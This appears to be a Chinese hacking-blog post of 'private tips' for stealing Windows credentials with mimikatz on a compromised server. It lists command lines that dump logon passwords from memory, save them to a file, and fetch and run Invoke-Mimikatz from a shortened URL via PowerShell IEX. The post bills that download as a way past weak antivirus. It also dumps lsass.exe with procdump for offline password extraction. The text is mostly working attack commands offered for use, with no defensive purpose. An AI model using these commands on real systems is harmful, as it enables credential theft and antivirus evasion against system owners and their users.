欢迎光临
我们一直在努力

关于mimikatz的玩法(私人技巧)

一条命令抓密码

C:/phpStudy/WWW/mimikatz.exe privilege::debug sekurlsa::logonpasswords

当然如果不回显你可以写入一个文件

C:/phpStudy/WWW/mimikatz.exe privilege::debug sekurlsa::logonpasswords >> C:/phpStudy/WWW/1.txt exit

无文件抓密码

可以躲避过低级的杀软

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

这里有一篇介绍如何免杀的http://www.hackdig.com/01/hack-42525.htm

彻底免杀抓密码

很多情况下有杀软这种瘟神挡道,我们必须另想办法。procdump是微软官方提供的一个小工具,在微软官方有下载

https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx ?然后上传相应的版本到目标

C:/phpStudy/WWW/Procdump.exe -accepteula -ma lsass.exe C:/phpStudy/WWW/lsass.dmp

(后缀无法改)然后把lsass.dmp拖到你本机上,记住目标机器的版本号,对应如下

minidump_matrix 关于mimikatz的玩法(私人技巧)

举例

  • Dump d’un Windows 2003?=> mimikatz x86 运行在?Windows 2003 x86
  • Dump d’un 2008?x64 => mimikatz x64 运行在 Windows 2008?x64

下面本机开始读取密码,用DOS 进入mimikatz ,(双击mimikatz 是不能复制粘贴的)

sekurlsa::minidump lsass.dmp 
sekurlsa::logonPasswords
exit

 

未经允许不得转载:杂术馆 » 关于mimikatz的玩法(私人技巧)
分享到: 更多 (0)